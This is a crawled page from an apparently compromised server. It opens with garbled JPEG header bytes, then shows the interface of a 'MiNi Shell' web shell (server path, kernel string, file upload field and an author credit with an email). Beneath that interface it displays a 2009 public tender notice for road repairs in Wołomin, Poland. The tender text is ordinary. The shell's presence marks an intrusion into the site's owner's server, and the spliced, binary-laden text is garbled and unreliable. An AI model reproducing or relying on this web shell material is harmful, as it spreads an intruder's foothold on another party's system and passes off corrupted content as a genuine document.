JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/26768-N-2009.html

<p class="kh_header"><b>Wołomin: BIEŻĄCE REMONTY CZĄSTKOWE UTRZYMANIE DRÓG O NAWIERZCHNIACH ULEPSZONYCH MINERALNO BITUMICZNYCH I TŁUCZNIOWYCH, PRZEBUDOWY DRÓG I WJAZDÓW Z ZAKRESIE POPRAWIAJĄCYM PRZEJEZDNOŚĆ ORAZ PODWYŻSZAJĄCYM PARAMETRY TECHNICZNE I EKSPLATACYJNE NA TERENIE  GMINY WOŁOMIN</b><br>
<b>Numer ogłoszenia: 26768 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wołomin , ul. Ogrodowa 4, 05-200 Wołomin, woj. mazowieckie, tel. 02 7633000, faks 022 7633066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCE REMONTY CZĄSTKOWE UTRZYMANIE DRÓG O NAWIERZCHNIACH ULEPSZONYCH MINERALNO BITUMICZNYCH I TŁUCZNIOWYCH, PRZEBUDOWY DRÓG I WJAZDÓW Z ZAKRESIE POPRAWIAJĄCYM PRZEJEZDNOŚĆ ORAZ PODWYŻSZAJĄCYM PARAMETRY TECHNICZNE I EKSPLATACYJNE NA TERENIE  GMINY WOŁOMIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Bieżące  remonty cząstkowe dróg o nawierzchniach ulepszonych mineralno - bitumicznych i tłuczniowych, przebudowy dróg w zakresie poprawiającym przejezdność oraz podwyższającym parametry techniczne i eksploatacyjne na terenie gminy Wołomin, określone w opisie przedmiotu zamówienia polegają  na wykonywaniu bieżących napraw cząstkowych nawierzchni bitumicznych, wykonywaniu nakładek asfaltowych wyrównujących,  napraw i wykonywaniu nawierzchni  tłuczniowych zlecanych w miarę potrzeb przez Zamawiającego. 
2. Wykonawca robót zobowiązany jest ponadto do:
2.1 Wykonania zamówienia zgodnie z  zakresem robót określonych w pkt 2.1,  kosztorysem ofertowym, a także zgodnie z warunkami wynikającymi z przepisów technicznych i  budowlanych.
2.2 Wykonania zamówienia zgodnie z wymaganiami wynikającymi z aktualnych Polskich Norm i aprobat technicznych.    
2.3 Wykonania zamówienia zgodnie z zasadami rzetelnej wiedzy technicznej i sztuką budowlaną.
2.4 Wykonania projektu organizacji ruchu na czas prowadzonych robót, jeśli prowadzone roboty wymagają zajęcia jezdni i powodują utrudnienia w ruchu.
2.5 Zabezpieczenia obsługi geodezyjnej w przypadku zaistnienia takiej potrzeby.
2.6 Wykonania trwałego oznakowania i zabezpieczenia prowadzonych robót zgodnie z przepisami BHP. 
2.7 Prowadzenia robót zgodnie z obowiązującymi warunkami technicznymi wykonania i odbioru robót oraz w zgodności  z obowiązującymi normami technicznymi.
2.8 Wykonania wszelkich robót przygotowawczych, porządkowych, przywrócenia terenu budowy wraz z 
przyległym  otoczeniem do stanu pierwotnego ( w trakcie budowy i po jej zakończeniu ), związanych z wywozem i  składowaniem  odpadów i śmieci oraz innych materiałów i nieczystości ;
2.9 Ponoszenia ryzyka finansowego uszkodzenia, kradzieży zniszczenia lub utraty wszelkich materiałów, urządzeń i wyposażenia znajdujących się na terenie budowy oraz wszelkich innych szkód w mieniu znajdującym się na terenie budowy. Wystąpienie takich szkód nie zwalnia Wykonawcy z obowiązku terminowego i należytego wykonania przedmiotu umowy, z chwilą przekazania  terenu budowy Wykonawca ponosi ryzyko ewentualnych - wywołanych ingerencją osób trzecich - opóźnień   robót   jak i w usuwaniu stwierdzonych wad i usterek.
2.10  Zapewnienia narzędzi i sprzętu niezbędnych do realizacji zamówienia; 
2.11 Zawiadomienia i zapewnienie nadzoru uprawnionych pracowników służb technicznych eksploatorów sieci ( właścicieli uzbrojenia ) nad robotami instalacyjnymi i pracami ziemnymi;  zapewnienie odpowiednich warunków socjalnych dla pracowników zatrudnionych przy wykonywani przedmiotu  umowy. 2.12. w przypadku powstania nieprzewidzianej awarii na drogach, zagrażającej bezpieczeństwu ruchu  samochodowego lub pieszego, Wykonawca zobowiązany jest natychmiast przystąpić do jej usuwania lub gdy nie ma możliwości natychmiastowego usunięcia awarii do zabezpieczenia miejsca jej powstania w terminie nie dłuższym niż ? godziny od momentu otrzymania zlecenia w formie ustnej, telefonicznej lub pisemnej. Zlecenia przekazywane w takich przypadkach w formie telefonicznej  potwierdzane będą pisemnie najpóźniej do końca następnego dnia od zgłoszenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 40.000,00 zł (słownie: czterdzieści tysięcy  złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych ( Dz. U z 2007 r. Nr 223, poz.1655 z póź. zm), a także spełniający warunki, o których mowa w art. 22 ust.1 w/w. ustawy. 1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia a) Posiadają zezwolenie na prowadzenie działalności w zakresie transportu, zbierania i odzysku odpadów w postaci gruzów, betonowych, ceglanych i żużlowych z przeznaczeniem  na podbudowy dróg oraz utwardzanie terenów wydana  na podstawie ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. nr 62, poz 628 z póź. zm.) lub umowę o współpracy z podmiotem posiadającym ww. zezwolenie
 2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia a) Przedstawią wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 roboty odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz złożą dokumenty potwierdzające, że roboty te zostały wykonane należycie. 
b) Wykażą osobowy personel, który będzie sprawować funkcję kierownictwa przedmiotowych prac.  Kierownictwo przedmiotowych robót musi posiadać doświadczenie zawodowe oraz odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi będącymi przedmiotem postępowania oraz posiadać aktualne zaświadczenie o przynależności do odpowiedniej izby samorządu zawodowego ( na potwierdzenie należy dołączyć uprawnienia, zaświadczenia o wpisie do Izby). Osoba ta (kierownik) musi posiadać minimum 5 letnie doświadczenie zawodowe na stanowisku kierownika robót budowlanych w branży  drogowej.
c) Wykonawca winien dysponować narzędziami i urządzeniami dostosowanymi do wykonania usługi objętej zamówieniem. Sprzęt winien być sprawny techniczne i winien zapewnić pełne bezpieczeństwo. Wykonawca powinien wykazać się dysponowaniem niezbędnych do wykonania zamówienia narzędzi i urządzeń w tym, co najmniej: Wykonawca winien dysponować narzędziami i urządzeniami dostosowanymi do wykonania usługi objętej zamówieniem. Sprzęt winien być sprawny techniczne i winien zapewnić pełne bezpieczeństwo. Wykonawca powinien wykazać się dysponowaniem niezbędnych do wykonania zamówienia narzędzi i urządzeń w tym, co najmniej:
1. rozkładarka mas bitumicznych - 1 szt.
2. walec stalowo-wibracyjny /gładzik/  - 1szt.
3. walec gumowo-stalowy - 1szt.
4. kotły do asfaltu lanego (rajzery) co najmniej  - 2szt.
5. przecinarka do nawierzchni asfaltowych  - 1szt.
6. koparka o poj. łyżki minimum 0,6 m3  - 1szt.
7. koparko-ładowarka  -1szt.
8. samochody ciężarowe samowyładowawcze o ładowności min. 10 ton  -3szt.
9. równiarka o mocy silnika minimum 120 KM.  - 1szt.
  10.zagęszczarki wibracyjne - 2szt.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia a) Posiadają polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł 4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; - opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu - Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń żądanych przez zamawiającego będzie stanowić podstawę oceny spełniania warunków udziału w postępowaniu. Zamawiający przy ocenie ofert bedzie kierował się formuła - spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I) W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności należy załączyć: a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c)  Przedłożą zezwolenie na prowadzenie działalności w zakresie transportu, zbierania i odzysku odpadów w postaci gruzów, betonowych, ceglanych i żużlowych z przeznaczeniem na podbudowy dróg oraz utwardzanie terenów wydana  na podstawie ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz.U. nr 62, poz 628 z póź. zm.) lub umowę o współpracy z podmiotem posiadającym ww. zezwolenie
d) Oferta składana przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zastosowanie znajduje § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87 poz. 605 z póź.zm.) 
 II. W celu potwierdzenia, że wykonawca spełnia warunek, o którym mowa w art. 22 ust.1 pkt 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, należy załączyć: a)  wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia  postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 zamówienia odpowiadające swoim rodzajem  i wartością  robotom budowlanym stanowiącym przedmiot niniejszego zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z  załączeniem dokumentów potwierdzających, że  roboty te zostały wykonane należycie ( np. referencje, protokół odbioru końcowego itp.)
b)  wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu  wykonywanych przez nie czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, wykonawca wskazał osoby, którymi będzie dysponował. Kierownictwo przedmiotowych robót musi posiadać doświadczenie zawodowe oraz odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi będącymi przedmiotem postępowania oraz posiadać aktualne zaświadczenie o przynależności do odpowiedniej izby samorządu zawodowego ( na potwierdzenie należy dołączyć uprawnienia, zaświadczenia o wpisie do Izby). Osoba pełniąca funkcję kierownika robót powinna mieć minimum 5 letni staż pracy na stanowisku kierownika robotami budowlanymi w branży  drogowej. c) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca lub pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń jeżeli w wykazie wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował 
1. rozkładarka mas bitumicznych - 1 szt.
2. walec stalowo-wibracyjny /gładzik- 1szt.
3. walec gumowo-stalowy - 1szt.
4. kotły do asfaltu lanego (rajzery) co najmniej  - 2szt.
5. przecinarka do nawierzchni asfaltowych  - 1szt.
6. koparka o poj. łyżki minimum 0,6 m3 - 1szt.
7. koparko-ładowarka  -1szt.
8. samochody ciężarowe samowyładowawcze o ładowności min. 10 ton  -3szt.
9. równiarka o mocy silnika minimum 120 KM. - 1szt.
  10.zagęszczarki wibracyjne - 2szt.
Sprzęt winien być sprawny techniczne i winien zapewnić pełne bezpieczeństwo.
    III.  W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy załączyć:
 a) polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wolomin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wołominie, ul. Ogrodowa 4, pok. 223.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: Urząd Miejski w Wołominie, ul. Ogrodowa 4, Biuro Obsługi Mieszkańców stanowiska kancelaryjne numer: 1, 2, 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com